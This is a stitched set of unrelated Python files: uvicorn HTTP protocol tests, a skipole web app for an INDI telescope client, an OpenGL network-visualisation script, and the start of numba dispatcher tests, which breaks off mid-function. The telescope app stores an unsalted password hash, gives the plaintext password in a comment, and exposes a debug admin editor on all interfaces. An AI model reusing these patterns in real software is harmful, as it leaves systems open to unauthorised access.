protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_partial_response_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_duplicate_start_message(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.start", "status": 200})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_missing_start_message(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.body", "body": b""})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_message_after_body_complete(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b""})
await send({"type": "http.response.body", "body": b""})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_value_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b""})
return 123
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_disconnect(protocol_cls, event_loop):
got_disconnect_event = False
async def app(scope, receive, send):
nonlocal got_disconnect_event
while True:
message = await receive()
if message["type"] == "http.disconnect":
break
got_disconnect_event = True
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.eof_received()
protocol.connection_lost(None)
protocol.loop.run_one()
assert got_disconnect_event
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_response(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(START_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
protocol.data_received(FINISH_POST_REQUEST)
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_read_after_response(protocol_cls, event_loop):
message_after_response = None
async def app(scope, receive, send):
nonlocal message_after_response
response = Response("Hello, world", media_type="text/plain")
await response(scope, receive, send)
message_after_response = await receive()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert message_after_response == {"type": "http.disconnect"}
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_http10_request(protocol_cls, event_loop):
async def app(scope, receive, send):
content = "Version: %s" % scope["http_version"]
response = Response(content, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(HTTP10_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Version: 1.0" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_root_path(protocol_cls, event_loop):
async def app(scope, receive, send):
path = scope.get("root_path", "") + scope["path"]
response = Response("Path: " + path, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(
app, protocol_cls, event_loop, root_path="/app"
) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Path: /app/" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_raw_path(protocol_cls, event_loop):
async def app(scope, receive, send):
path = scope["path"]
raw_path = scope.get("raw_path", None)
assert "/one/two" == path
assert b"/one%2Ftwo" == raw_path
response = Response("Done", media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(
app, protocol_cls, event_loop, root_path="/app"
) as protocol:
protocol.data_received(GET_REQUEST_WITH_RAW_PATH)
protocol.loop.run_one()
assert b"Done" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_max_concurrency(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, limit_concurrency=1
) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 503 Service Unavailable" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_request(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.shutdown()
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_idle(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.shutdown()
assert protocol.transport.buffer == b""
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_sent_when_body_consumed(protocol_cls, event_loop):
async def app(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
response = Response(b"Body: " + body, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
EXPECT_100_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Expect: 100-continue",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
protocol.data_received(EXPECT_100_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 100 Continue" in protocol.transport.buffer
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b'Body: {"hello": "world"}' in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_not_sent_when_body_not_consumed(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
EXPECT_100_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Expect: 100-continue",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
protocol.data_received(EXPECT_100_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 100 Continue" not in protocol.transport.buffer
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_unsupported_upgrade_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop, ws="none") as protocol:
protocol.data_received(UPGRADE_REQUEST)
assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
assert b"Unsupported upgrade request." in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_supported_upgrade_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, ws="wsproto"
) as protocol:
protocol.data_received(UPGRADE_REQUEST)
assert b"HTTP/1.1 426 " in protocol.transport.buffer
async def asgi3app(scope, receive, send):
pass
def asgi2app(scope):
async def asgi(receive, send):
pass
return asgi
asgi_scope_data = [
(asgi3app, {"version": "3.0", "spec_version": "2.3"}),
(asgi2app, {"version": "2.0", "spec_version": "2.3"}),
]
@pytest.mark.parametrize("asgi2or3_app, expected_scopes", asgi_scope_data)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_scopes(asgi2or3_app, expected_scopes, protocol_cls, event_loop):
with get_connected_protocol(asgi2or3_app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert expected_scopes == protocol.scope.get("asgi")
@pytest.mark.parametrize(
"request_line",
[
pytest.param(b"G?T / HTTP/1.1", id="invalid-method"),
pytest.param(b"GET /?x=y z HTTP/1.1", id="invalid-path"),
pytest.param(b"GET / HTTP1.1", id="invalid-http-version"),
],
)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http_request(request_line, protocol_cls, caplog, event_loop):
app = Response("Hello, world", media_type="text/plain")
request = INVALID_REQUEST_TEMPLATE % request_line
caplog.set_level(logging.INFO, logger="uvicorn.error")
logging.getLogger("uvicorn.error").propagate = True
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(request)
assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
assert b"Invalid HTTP request received." in protocol.transport.buffer
def test_fragmentation():
def receive_all(sock):
chunks = []
while True:
chunk = sock.recv(1024)
if not chunk:
break
chunks.append(chunk)
return b"".join(chunks)
app = Response("Hello, world", media_type="text/plain")
def send_fragmented_req(path):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 8000))
d = (
f"GET {path} HTTP/1.1\r\n" "Host: localhost\r\n" "Connection: close\r\n\r\n"
).encode()
split = len(path) // 2
sock.sendall(d[:split])
time.sleep(0.01)
sock.sendall(d[split:])
resp = receive_all(sock)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
return resp
config = Config(app=app, http="httptools")
server = Server(config=config)
t = threading.Thread(target=server.run)
t.daemon = True
t.start()
time.sleep(1) # wait for unicorn to start
path = "/?param=" + "q" * 10
response = send_fragmented_req(path)
bad_response = b"HTTP/1.1 400 Bad Request"
assert bad_response != response[: len(bad_response)]
server.should_exit = True
t.join()
|
indiclient.py
|
#!/home/bernard/acenv/bin/python3
import os, threading, sys, hashlib, uuid, pathlib
from indi_mr import mqtttoredis, mqtt_server, redis_server, tools
from indiredis import make_wsgi_app
from skipole import WSGIApplication, FailPage, GoTo, ValidateError, ServerError, use_submit_list, skis
from waitress import serve
mqtt_host = mqtt_server(host='localhost', port=1883)
redis_host = redis_server(host='localhost', port=6379)
# This service needs a redis connection to store cookies
rconn = tools.open_redis(redis_host)
PROJ_DATA={"rconn":rconn, # redis connection
"username":"localcontrol", # the username which must be used to log in
"password": "6f852ab4bb9e13ac5095377eddb251a09afd27dbb95c788e075ca63860f9ce8cac75fa9165bb739c0e629f2be201ddf57f261ab982cfd7f88687412ff0d1ea64"
}
# The password above is an hashed password, being the result of running
# python3 hashpassword.py, and copying the result here, currently password is 'remscope'
# Set a directory of your choice where blobs will be stored
BLOBS = '/home/bernard/indiblobs'
PROJECTFILES = os.path.dirname(os.path.realpath(__file__))
PROJECT = "indiclient"
def _is_user_logged_in(skicall):
received_cookies = skicall.received_cookies
if PROJECT not in received_cookies:
return False
# get cookie
rconn = skicall.proj_data["rconn"]
# the current cookiestring is stored in redis at key 'cookiestring'
cookievalue = rconn.get('cookiestring')
if not cookievalue:
return False
cookiestring = cookievalue.decode('utf-8')
if received_cookies[PROJECT] != cookiestring:
return False
return True
def _hash_password(username, password):
"Return hashed password, as a string, on failure return None"
seed_password = username + password
hashed_password = hashlib.sha512( seed_password.encode('utf-8') ).hexdigest()
return hashed_password
def _create_cookie(skicall):
"Generates a random cookie, store it in redis, and return the cookie"
rconn = skicall.proj_data["rconn"]
# generate a cookie string
cookiestring = uuid.uuid4().hex
rconn.set('cookiestring', cookiestring, ex=3600) # expire after one hour
return cookiestring
def start_call(called_ident, skicall):
"When a call is initially received this function is called."
# to serve static files, you can map a url to a server static directory
# the user does not have to be logged in to access these
servedfile = skicall.map_url_to_server("images", "/home/bernard/indiblobs")
if servedfile:
return servedfile
if _is_user_logged_in(skicall):
# The user is logged in, so do not show the index page, or check login page
if (called_ident == (PROJECT, 1)) or (called_ident == (PROJECT, 10)):
# instead jump straight to indi client
return ('indiredis', 1)
# any other page, such as css or image files are ok
return called_ident
# You may wish to apply the decorator '@use_submit_list' to the submit_data
# function below. See the skipole documentation for details.
def submit_data(skicall):
"This function is called when a Responder wishes to submit data for processing in some manner"
if skicall.ident_list[-1] == (PROJECT, 10):
# this call is to checklogin from the login page
skicall.call_data['authenticate'] = False
username = skicall.proj_data["username"]
if (("login", "input_text1") in skicall.call_data) and (skicall.call_data["login", "input_text1"] == username):
if ("login", "input_text2") in skicall.call_data:
password = skicall.call_data["login", "input_text2"]
hashed = _hash_password(username, password)
if hashed == skicall.proj_data["password"]:
skicall.call_data['authenticate'] = True
if skicall.call_data['authenticate']:
return
else:
raise FailPage("Invalid input")
if skicall.ident_list[-1] == (PROJECT, 20):
# this call is to populate the showfiles page
serverpath = pathlib.Path(BLOBS)
serverfiles = [f.name for f in serverpath.iterdir() if f.is_file()]
if not serverfiles:
skicall.page_data['nothingfound', 'show'] = True
skicall.page_data['filelinks', 'show'] = False
return
skicall.page_data['nothingfound', 'show'] = False
skicall.page_data['filelinks', 'show'] = True
# The widget has links formed from a list of lists
# 0 : The url, label or ident of the target page of the link
# 1 : The displayed text of the link
# 2 : If True, ident is appended to link even if there is no get field
# 3 : The get field data to send with the link
serverfiles.sort(reverse=True)
filelinks = []
for sf in serverfiles:
# create a link to urlfolder/sf
filelinks.append([ "images/" + sf, sf, False, ""])
skicall.page_data['filelinks', 'nav_links'] = filelinks
return
if skicall.ident_list[-1] == (PROJECT, 30):
# this call is to log out
skicall.call_data['logout'] = True
return
def end_call(page_ident, page_type, skicall):
"""This function is called at the end of a call prior to filling the returned page with skicall.page_data,
it can also return an optional session cookie string."""
if ('authenticate' in skicall.call_data) and skicall.call_data['authenticate']:
# a user has logged in, set a cookie
return _create_cookie(skicall)
if ('logout' in skicall.call_data) and skicall.call_data['logout']:
# a user has been logged out, set a new random cookie in redis, and an invalid cookie in the client
_create_cookie(skicall)
return "xxxxxxxx"
return
def check_cookies_function(received_cookies, proj_data):
"""Returns None if call can proceed to sub project"""
if PROJECT not in received_cookies:
# no cookie, must go to top login page
return (PROJECT, 1)
# get cookie
rconn = proj_data["rconn"]
# the current cookiestring is stored in redis at key 'cookiestring'
cookievalue = rconn.get('cookiestring')
if not cookievalue:
return (PROJECT, 1)
cookiestring = cookievalue.decode('utf-8')
if received_cookies[PROJECT] != cookiestring:
# invalid cookie, return to top page
return (PROJECT, 1)
return
# The above functions are required as arguments to the skipole.WSGIApplication object
# and will be called as required.
# create the wsgi application
application = WSGIApplication(project=PROJECT,
projectfiles=PROJECTFILES,
proj_data=PROJ_DATA,
start_call=start_call,
submit_data=submit_data,
end_call=end_call,
url="/")
skis_application = skis.makeapp()
application.add_project(skis_application, url='/lib')
indi_application = make_wsgi_app(redis_host, blob_folder=BLOBS)
application.add_project(indi_application, url='/indi', check_cookies=check_cookies_function)
from skipole import skiadmin, set_debug
set_debug(True)
skiadmin_application = skiadmin.makeapp(editedprojname=PROJECT)
application.add_project(skiadmin_application, url='/skiadmin')
# serve the application with the python waitress web server in its own thread
webapp = threading.Thread(target=serve, args=(application,), kwargs={'host':'0.0.0.0', 'port':8000})
# and start it
webapp.start()
# and start mqtttoredis
mqtttoredis('indi_localclient', mqtt_host, redis_host, blob_folder=BLOBS)
|
start_tool.py
|
import logging
import threading
import time
from OpenGL.GL import *
from gui.constants import StatisticLink
from gui.ui_window import OptionGui
from opengl_helper.screenshot import create_screenshot
from processing.network_processing import NetworkProcessor
from utility.file import FileHandler
from utility.log_handling import setup_logger
from utility.performance import track_time
from utility.types import CameraPose
from utility.window import WindowHandler, Window
global options_gui
options_gui = OptionGui()
setup_logger("tool")
def compute_render(some_name: str):
global options_gui
width, height = 1920, 1200
FileHandler().read_statistics()
window_handler: WindowHandler = WindowHandler()
window: Window = window_handler.create_window()
window.set_callbacks()
window.activate()
logging.info("OpenGL Version: %d.%d" % (glGetIntegerv(GL_MAJOR_VERSION), glGetIntegerv(GL_MINOR_VERSION)))
network_processor: NetworkProcessor or None = None
@track_time(track_recursive=False)
def frame():
window_handler.update()
if "trigger_network_sample" in options_gui.settings and options_gui.settings["trigger_network_sample"] > 0:
network_processor.reset_edges()
options_gui.settings["trigger_network_sample"] = 0
if network_processor is not None:
network_processor.process(options_gui.settings["action_state"])
network_processor.render(window.cam, options_gui.render_config, options_gui.settings["show_class"])
if StatisticLink.SAMPLE_COUNT in options_gui.settings:
options_gui.settings[StatisticLink.SAMPLE_COUNT].set(network_processor.edge_processor.point_count)
if StatisticLink.EDGE_COUNT in options_gui.settings:
options_gui.settings[StatisticLink.EDGE_COUNT].set(network_processor.edge_processor.get_edge_count())
if StatisticLink.CELL_COUNT in options_gui.settings:
options_gui.settings[StatisticLink.CELL_COUNT].set(
network_processor.grid_processor.grid.grid_cell_count_overall)
if StatisticLink.PRUNED_EDGES in options_gui.settings:
options_gui.settings[StatisticLink.PRUNED_EDGES].set(network_processor.network.pruned_edges)
window.swap()
while options_gui is None or (
len(options_gui.settings["current_layer_data"]) is 0 and not options_gui.settings["Closed"]):
window_handler.update()
time.sleep(5)
if not options_gui.settings["Closed"]:
print("Start building network: " + str(options_gui.settings["current_layer_data"]))
network_processor = NetworkProcessor(options_gui.settings["current_layer_data"],
options_gui.processing_config,
importance_data=options_gui.settings["importance_data"],
processed_nn=options_gui.settings["processed_nn"])
window.cam.base = network_processor.get_node_mid()
window.cam.set_position(CameraPose.LEFT)
fps: float = 120
frame_count: int = 0
to_pause_time: float = 0
last_frame_count: int = 0
checked_frame_count: int = -1
check_time: float = time.perf_counter()
last_time: float = time.perf_counter()
while window.is_active() and not options_gui.settings["Closed"]:
if options_gui.settings["update_model"]:
options_gui.settings["update_model"] = False
network_processor.delete()
print("Rebuilding network: " + str(options_gui.settings["current_layer_data"]))
network_processor = NetworkProcessor(options_gui.settings["current_layer_data"],
options_gui.processing_config,
importance_data=options_gui.settings["importance_data"],
processed_nn=options_gui.settings["processed_nn"])
window.cam.base = network_processor.get_node_mid()
window.cam.set_position(CameraPose.LEFT)
frame()
if window.screenshot:
if "network_name" in options_gui.settings.keys():
create_screenshot(width, height, options_gui.settings["network_name"])
else:
create_screenshot(width, height)
window.screenshot = False
elif window.record:
window.frame_id += 1
if "network_name" in options_gui.settings.keys():
create_screenshot(width, height, options_gui.settings["network_name"], frame_id=window.frame_id)
else:
create_screenshot(width, height, frame_id=window.frame_id)
frame_count += 1
if time.perf_counter() - check_time > 1.0:
options_gui.settings[StatisticLink.FPS].set(float(
"{:.2f}".format(float(frame_count - checked_frame_count) / (time.perf_counter() - check_time))))
checked_frame_count = frame_count
check_time = time.perf_counter()
if "save_file" in options_gui.settings.keys() and options_gui.settings["save_file"]:
network_processor.save_model(options_gui.settings["save_processed_nn_path"])
options_gui.settings["save_file"] = False
current_time: float = time.perf_counter()
elapsed_time: float = current_time - last_time
if elapsed_time < 1.0 / fps:
if elapsed_time > 0.001:
to_pause_time += (float(frame_count - last_frame_count) / fps) - elapsed_time
last_frame_count = frame_count
last_time = current_time
if to_pause_time > 0.005:
time.sleep(to_pause_time)
paused_for: float = time.perf_counter() - current_time
to_pause_time -= paused_for
last_time += paused_for
else:
last_frame_count = frame_count
last_time = current_time
to_pause_time = 0 if to_pause_time < 0 else to_pause_time - (elapsed_time - 1.0 / fps)
network_processor.delete()
FileHandler().write_statistics()
window_handler.destroy()
options_gui.destroy()
compute_render_thread: threading.Thread = threading.Thread(target=compute_render, args=(1,))
compute_render_thread.setDaemon(True)
compute_render_thread.start()
options_gui.start()
|
test_dispatcher.py
|
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
from io import StringIO
import numpy as np
from numba import jit, generated_jit, typeof
from numba.core import types, errors, codegen
from numba import _dispatcher
from numba.core.compiler import compile_isolated
from numba.core.errors import NumbaWarning
from numba.tests.support import (TestCase, temp_directory, import_dynamic,
override_env_config, capture_cache_log,
captured_stdout)
from numba.np.numpy_support import as_dtype
from numba.core.caching import _UserWideCacheLocator
from numba.core.dispatcher import Dispatcher
from numba.tests.support import skip_parfors_unsupported, needs_lapack
import llvmlite.binding as ll
import unittest
from numba.parfors import parfor
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_equality(self):
@jit
def foo(x):
return x
@jit
def bar(x):
return x
# Written this way to verify `==` returns a bool (gh-5838). Using
# `assertTrue(foo == foo)` or `assertEqual(foo, foo)` would defeat the
# purpose of this test.
self.assertEqual(foo == foo, True)
self.assertEqual(foo == bar, False)
self.assertEqual(foo == None, False) # noqa: E711
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must be match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
